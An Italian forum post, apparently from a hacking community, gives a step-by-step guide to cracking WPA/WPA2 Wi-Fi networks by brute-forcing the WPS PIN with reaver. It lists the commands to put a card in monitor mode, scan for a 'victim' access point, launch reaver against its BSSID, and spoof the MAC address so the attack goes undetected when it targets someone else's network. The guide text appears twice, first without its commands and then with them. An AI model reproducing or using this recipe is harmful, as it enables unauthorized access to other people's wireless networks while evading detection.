Ultima modifica da un moderatore:
Ho deciso di scrivere questa guida perchè nel forum sono presenti solo guide di aircrack che nel caso delle wpa ci porta quasi certamente ad un fallimento nel tentare di crakkare l'handshake.
Questo tool che è presente nella suite di aircrack che pochi conoscono ci consente di craccare una wpa o wpa2 in poche ore!! senza alcun bisogno di dizionary ecc... Il suo nome è reaver-ng, reaver sfrutta un bug del canale wps effettuando un bruteforce del pin di 8 cifre, quindi è efficace solo su AP con il WPS attivato.
Ma basta chiacchiere e passiamo alla pratica reaver per funzionare ha bisogno anche di aircrack nello specifico di airmon-ng per settare la scheda di rete in monitor mode
quindi il primo passo e digitare da terminale
Ora la nostra scheda è in monitor mode
Il Secondo passo è scegliere la vittima cercandola con il programma che più ci piace io usero airodump-ng
Quando avremo trovato la vittima stoppiamo lo scan con Ctrl + C e copiamo il bssid della vittima
Ora come terzo passo andiamo all'attacco, procedendo cosi:
Configurazione:
Esempio:
Il "-vv" sta per verbosity cioè mostra in dettaglio quello che sta facendo il programma, digitando:
Se invece vogliamo utilizzare un pin personale il codice sarà:
Script per calcolare il pin - http://www.inforge.net/community/wifi-hacking-guide/402708-calcolare-pin-wps-router.html
Si stamperanno a video tutte le opzioni aggiuntive
Se invece non stiamo testando il nostro AP ma vogliamo effettuare un attacco senza essere scoperti è necessario cambiare il mac del nostro pc. sempre dal terminale di backtrack digitiamo
Spero che la guida vi sia servita e spero anche di non aver dimenticato nulla
Questo tool che è presente nella suite di aircrack che pochi conoscono ci consente di craccare una wpa o wpa2 in poche ore!! senza alcun bisogno di dizionary ecc... Il suo nome è reaver-ng, reaver sfrutta un bug del canale wps effettuando un bruteforce del pin di 8 cifre, quindi è efficace solo su AP con il WPS attivato.
Ma basta chiacchiere e passiamo alla pratica reaver per funzionare ha bisogno anche di aircrack nello specifico di airmon-ng per settare la scheda di rete in monitor mode
quindi il primo passo e digitare da terminale
Codice:
airmon-ng start wlan0
Ora la nostra scheda è in monitor mode
Il Secondo passo è scegliere la vittima cercandola con il programma che più ci piace io usero airodump-ng
Codice:
airodump-ng mon0
Quando avremo trovato la vittima stoppiamo lo scan con Ctrl + C e copiamo il bssid della vittima
Ora come terzo passo andiamo all'attacco, procedendo cosi:
Configurazione:
Codice:
reaver -i "interfaccia" -b "bssid vittima" -vv
Codice:
reaver -i mon0 -b 11:22:33:44:55:66 -vv
Il "-vv" sta per verbosity cioè mostra in dettaglio quello che sta facendo il programma, digitando:
Se invece vogliamo utilizzare un pin personale il codice sarà:
Codice:
reaver -i mon0 -b 11:22:33:44:55:66 -vv -p "pin personale"
Codice:
reaver --help
Se invece non stiamo testando il nostro AP ma vogliamo effettuare un attacco senza essere scoperti è necessario cambiare il mac del nostro pc. sempre dal terminale di backtrack digitiamo
Codice:
ifconfig wlan0 down
ifconfig wlan0 hw ether "nuovo mac inventato"
ifconfig wlan0 up
Spero che la guida vi sia servita e spero anche di non aver dimenticato nulla